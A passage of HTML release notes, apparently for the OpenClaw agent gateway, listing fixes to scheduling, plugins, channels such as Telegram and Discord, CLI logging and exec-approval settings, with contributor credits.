<li>Browser/gateway: ignore Playwright dialog-close races from <code>Page.handleJavaScriptDialog</code> so browser automation no longer crashes the Gateway when a dialog disappears before Playwright accepts it. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041670448" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40067" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40067/hovercard" href="https://github.com/openclaw/openclaw/pull/40067">#40067</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/randyjtw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/randyjtw">@randyjtw</a>.</li>
<li>Cron/Gateway: defer missed isolated agent-turn catch-up out of the channel startup window, so overdue cron work cannot starve Discord or Telegram while providers connect after a restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Heartbeat/cron: defer heartbeat turns while cron work is active or queued, add opt-in <code>heartbeat.skipWhenBusy</code> for subagent/nested lane pressure, and retry busy skips without advancing the schedule so local Ollama hosts do not run heartbeat and cron prompts concurrently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4105361592" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50773" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50773/hovercard" href="https://github.com/openclaw/openclaw/issues/50773">#50773</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scottgl9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scottgl9">@scottgl9</a>.</li>
<li>Agents/thinking: honor configured model <code>compat.supportedReasoningEfforts</code> entries that include <code>xhigh</code>, so custom OpenAI-compatible provider refs expose and validate <code>/think xhigh</code> consistently across command menus, Gateway sessions, agent CLI, and <code>llm-task</code>. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087419491" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48904/hovercard" href="https://github.com/openclaw/openclaw/pull/48904">#48904</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Milchstrassse/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Milchstrassse">@Milchstrassse</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wufunc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wufunc">@wufunc</a>.</li>
<li>Vercel AI Gateway: expose provider-owned <code>/think xhigh</code> for trusted OpenAI/Codex upstream refs and Claude adaptive thinking for Anthropic upstream refs, while leaving untrusted namespaced refs on base levels. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048650454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41561" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/41561/hovercard" href="https://github.com/openclaw/openclaw/pull/41561">#41561</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zcg2021/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zcg2021">@Zcg2021</a>.</li>
<li>Plugins/runtime-deps: prune stale <code>openclaw-unknown-*</code> bundled runtime dependency roots during Gateway startup while keeping recent or locked roots, so old staging debris cannot keep growing across restarts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime-deps: include ten more root-package runtime dependencies (<code>@agentclientprotocol/sdk</code>, <code>@lydell/node-pty</code>, <code>croner</code>, <code>dotenv</code>, <code>jiti</code>, <code>json5</code>, <code>jszip</code>, <code>markdown-it</code>, <code>tar</code>, <code>web-push</code>) in <code>MIRRORED_CORE_RUNTIME_DEP_NAMES</code> so they are mirrored into the runtime-deps tree alongside <code>semver</code> and <code>tslog</code>, preventing <code>Cannot find package 'X'</code> failures from core dist code (for example <code>qmd-manager</code>, <code>cron/schedule</code>, <code>infra/archive</code>, <code>infra/push-web</code>, <code>infra/backup-create</code>, <code>process/supervisor/adapters/pty</code>) when no enabled extension owns the dependency. Adds a static drift guard test that scans <code>src/</code> for value imports of root-package deps and fails CI when one is missing from the mirror allowlist or extension-owned set. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348806638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74199" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74199/hovercard" href="https://github.com/openclaw/openclaw/issues/74199">#74199</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maxpuppet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maxpuppet">@maxpuppet</a>.</li>
<li>Ollama: compose caller abort signals with guarded-fetch timeouts for native <code>/api/chat</code> streams, so <code>/stop</code> and early cancellation still interrupt local Ollama requests that also carry provider timeout budgets. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348337046" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74133" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74133/hovercard" href="https://github.com/openclaw/openclaw/pull/74133">#74133</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Doctor/TTS: migrate legacy <code>messages.tts.enabled</code>, agent TTS, channel TTS, and voice-call plugin TTS toggles to <code>auto</code> mode during <code>openclaw doctor --fix</code>, matching the documented TTS config contract. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/logs: fall back to the configured Gateway file log when implicit loopback Gateway connections close or time out before or during <code>logs.tail</code>, so <code>openclaw logs</code> still works while diagnosing local-model Gateway disconnects. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347954374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74078" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74078/hovercard" href="https://github.com/openclaw/openclaw/issues/74078">#74078</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sakalaboator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sakalaboator">@sakalaboator</a>.</li>
<li>MCP/plugins: stringify non-array plugin tool results with chat-content coercion instead of default object stringification, so MCP callers receive useful JSON/text content from plugin tools. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Active Memory/QMD: make gateway-start QMD refresh opt-in via <code>memory.qmd.update.startup</code>, keep normal memory access lazy, preserve interactive file watching, and align watcher dependency/build ignores with QMD's scanner so cold gateway startup no longer imports or initializes QMD by default. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codexGW/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codexGW">@codexGW</a>.</li>
<li>Channels/Discord: remove Discord-owned queued-run timeout replies through the shared channel lifecycle queue while preserving message ordering and compatibility timeout constants, so long Discord turns stay governed by session/tool/runtime lifecycle instead of channel fallback errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codexGW/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codexGW">@codexGW</a>.</li>
<li>Agents/tools: clamp <code>process.poll</code> waits to 30 seconds, advertise that cap in the tool schema, and honor abort signals while waiting, so long command polls cannot pin agent responsiveness after cancellation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin SDK: add tracked Discord component-message helpers and a Telegram account-resolution compatibility facade, so existing plugins using those subpaths resolve while new plugins stay on generic channel SDK contracts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Shared labels: preserve Unicode combining marks and NFC-equivalent accented text in group/channel slug normalization so non-Latin labels no longer lose meaningful characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4185745477" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58932" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58932/hovercard" href="https://github.com/openclaw/openclaw/issues/58932">#58932</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4185851212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58942" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58942/hovercard" href="https://github.com/openclaw/openclaw/pull/58942">#58942</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4186444405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58995" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58995/hovercard" href="https://github.com/openclaw/openclaw/pull/58995">#58995</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fengqing-git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fengqing-git">@fengqing-git</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Starhappysh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Starhappysh">@Starhappysh</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koen666/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koen666">@koen666</a>.</li>
<li>Channels/Telegram: include probed video width and height when sending regular Telegram videos, so portrait clips render with the correct orientation instead of being stretched by clients. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3950913740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/18915" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/18915/hovercard" href="https://github.com/openclaw/openclaw/pull/18915">#18915</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/storyarcade/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/storyarcade">@storyarcade</a>.</li>
<li>Docs/Hetzner: clarify that SSH tunnel access requires <code>AllowTcpForwarding local</code> before running <code>ssh -L</code>, so hardened VPS sshd configs do not block loopback Gateway access. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136710669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54557" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54557/hovercard" href="https://github.com/openclaw/openclaw/issues/54557">#54557</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136836006" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54564" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54564/hovercard" href="https://github.com/openclaw/openclaw/pull/54564">#54564</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141007846" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54954" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54954/hovercard" href="https://github.com/openclaw/openclaw/pull/54954">#54954</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/satishkc7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/satishkc7">@satishkc7</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/blackstrype/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/blackstrype">@blackstrype</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Aftabbs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Aftabbs">@Aftabbs</a>.</li>
<li>Agents/config: preserve authored <code>agents.defaults.params</code> and per-model <code>agents.defaults.models[].params</code> during narrowed internal config writes, so OpenAI transport overrides such as <code>transport: "sse"</code> and <code>openaiWsWarmup: false</code> are not stripped from <code>openclaw.json</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344027749" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73607" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73607/hovercard" href="https://github.com/openclaw/openclaw/issues/73607">#73607</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341750455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73428" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73428/hovercard" href="https://github.com/openclaw/openclaw/issues/73428">#73428</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quangtran88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quangtran88">@quangtran88</a>.</li>
<li>Agents/model config: resolve per-model extra params through canonical model keys while preserving legacy double-prefixed fallback entries, so provider-prefixed model ids such as <code>openrouter/auto</code> keep their configured runtime params. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066560428" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44319" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44319/hovercard" href="https://github.com/openclaw/openclaw/pull/44319">#44319</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HenryXiaoYang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HenryXiaoYang">@HenryXiaoYang</a>.</li>
<li>Gateway/shutdown: report structured shutdown warnings and HTTP close timeout warnings through <code>ShutdownResult</code> while preserving lifecycle hook hardening. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046867239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41296" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/41296/hovercard" href="https://github.com/openclaw/openclaw/pull/41296">#41296</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/edenfunf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/edenfunf">@edenfunf</a>.</li>
<li>Control UI: keep Agents Overview and config-form select dropdowns on their configured value after options render while preserving inherited agent model placeholders. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042433661" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40352" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40352/hovercard" href="https://github.com/openclaw/openclaw/issues/40352">#40352</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4121542753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52948" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/52948/hovercard" href="https://github.com/openclaw/openclaw/pull/52948">#52948</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiaoquanidea/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiaoquanidea">@xiaoquanidea</a>.</li>
<li>Agents/exec: launch zsh, bash, and fish host exec shells with startup files suppressed while preserving existing PATH fallbacks, so daemon env is not overridden by shell startup files. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042016257" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40200" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40200/hovercard" href="https://github.com/openclaw/openclaw/pull/40200">#40200</a>; fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041976066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40179" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40179/hovercard" href="https://github.com/openclaw/openclaw/issues/40179">#40179</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NewdlDewdl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NewdlDewdl">@NewdlDewdl</a>.</li>
<li>Plugins/QA: prebuild the private QA channel runtime before plugin gauntlet source runs so wrapper CPU/RSS measurements are not polluted by private QA dist rebuild work. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/QA: add a Kitchen Sink plugin gauntlet that installs the external package, checks command inventory, MCP tools, channel status, provider turns, gateway RSS, CPU, and fatal log anomalies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/config: reuse the bundled plugin alias scan within a single config normalization pass, so Kitchen Sink-style plugin configs no longer peg Gateway CPU by repeatedly rescanning bundled metadata before agent turns. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/channels: reject malformed runtime channel registrations that omit required config helpers before they can poison channel status. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>MCP/plugins: serialize raw plugin tool return values through the plugin-tools MCP bridge so Kitchen Sink-style tools no longer surface <code>undefined</code> content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/reload: bound default restart deferral and SIGUSR1 restart drain to five minutes while preserving explicit <code>deferralTimeoutMs: 0</code> indefinite waits, so stale active work accounting cannot block config reloads forever. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Active Memory: register the prompt-build hook with the configured recall timeout plus setup grace instead of the 150s maximum budget, so default memory recall cannot delay turn startup for multiple minutes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/readiness: include an <code>eventLoop</code> diagnostic block in local or authenticated <code>/readyz</code> responses with event-loop delay (p99 and max), event-loop utilization, CPU core ratio, and a <code>degraded</code> flag, so operators can see when slow startups or runaway turns stall the event loop. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/agents: schedule accepted agent runs after the accepted RPC frame has a chance to flush, so pre-turn prompt/context work is less likely to starve immediate <code>agent.wait</code> callers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/update: tolerate stale memory-runtime import failures during best-effort CLI process teardown, so <code>openclaw update</code> replacing hashed runtime chunks before the finalizer runs no longer surfaces as exit-time <code>Cannot find module</code> noise. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/channels logs: reuse the rolling log-file resolver so <code>openclaw channels logs</code> falls back to the active dated log across date boundaries without reading unrelated custom log files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056125824" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42875" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42875/hovercard" href="https://github.com/openclaw/openclaw/issues/42875">#42875</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056258292" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42904/hovercard" href="https://github.com/openclaw/openclaw/pull/42904">#42904</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057041029" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43043" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43043/hovercard" href="https://github.com/openclaw/openclaw/pull/43043">#43043</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethanclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethanclaw">@ethanclaw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wdskuki/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wdskuki">@wdskuki</a>.</li>
<li>CLI/update: skip tracked plugins disabled in config during post-update plugin sync before npm, ClawHub, or marketplace update checks, preserving their install records without failing the update. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347036954" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73880" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73880/hovercard" href="https://github.com/openclaw/openclaw/issues/73880">#73880</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/islandpreneur007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/islandpreneur007">@islandpreneur007</a>.</li>
<li>Control UI: fix Peak Error Hours showing incorrect hourly rates when the browser's timezone observes DST, by storing hourly message counts with UTC date keys and using DST-aware <code>Date.getHours()</code> for local conversion. Also extract <code>accumulateMessageCounts</code> helper to reduce duplicated daily/hourly aggregation logic. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4092402816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49396" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49396/hovercard" href="https://github.com/openclaw/openclaw/pull/49396">#49396</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konanok/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konanok">@konanok</a>.</li>
<li>iMessage: normalize known leading attributedBody corruption markers on sent-message echo text keys so delayed reflected echoes with U+FFFD/U+FFFE/U+FFFF/FEFF prefixes are dropped without collapsing interior text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197665190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59973" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59973/hovercard" href="https://github.com/openclaw/openclaw/issues/59973">#59973</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197722194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59980" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59980/hovercard" href="https://github.com/openclaw/openclaw/pull/59980">#59980</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214583433" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62191" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62191/hovercard" href="https://github.com/openclaw/openclaw/pull/62191">#62191</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maguilar631697/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maguilar631697">@maguilar631697</a>.</li>
<li>Security/audit: recognize dangerous node command IDs as valid <code>gateway.nodes.denyCommands</code> entries, so audit only warns on real typos or unsupported patterns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4163604946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56923" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56923/hovercard" href="https://github.com/openclaw/openclaw/pull/56923">#56923</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chziyue/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chziyue">@chziyue</a>.</li>
<li>Cron: treat implicit text payloads with agent-turn overrides as agent turns, preserving model overrides for scheduled text prompts instead of pruning them as system events. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4001694353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/28905" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/28905/hovercard" href="https://github.com/openclaw/openclaw/issues/28905">#28905</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236386081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64060" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64060/hovercard" href="https://github.com/openclaw/openclaw/pull/64060">#64060</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liaoandi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liaoandi">@liaoandi</a>.</li>
<li>Telegram/exec approvals: stop treating general Telegram chat allowlists and <code>defaultTo</code> routes as native exec approvers; Telegram now uses explicit <code>execApprovals.approvers</code> or owner identity from <code>commands.ownerAllowFrom</code>, matching the first-pairing owner bootstrap path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Plugins/providers: keep Gateway startup primary-model discovery on metadata-only provider entries and reuse active non-speech capability providers even with explicit plugin entries, avoiding unnecessary provider registry loads during startup and media capability checks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345357678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73729" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73729/hovercard" href="https://github.com/openclaw/openclaw/issues/73729">#73729</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346570757" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73835" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73835/hovercard" href="https://github.com/openclaw/openclaw/issues/73835">#73835</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346027613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73793" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73793/hovercard" href="https://github.com/openclaw/openclaw/issues/73793">#73793</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346797079" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73853" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73853/hovercard" href="https://github.com/openclaw/openclaw/pull/73853">#73853</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346030125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73794/hovercard" href="https://github.com/openclaw/openclaw/pull/73794">#73794</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sg1416-zg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sg1416-zg">@sg1416-zg</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a>, and <a class="user-mention notranslate" 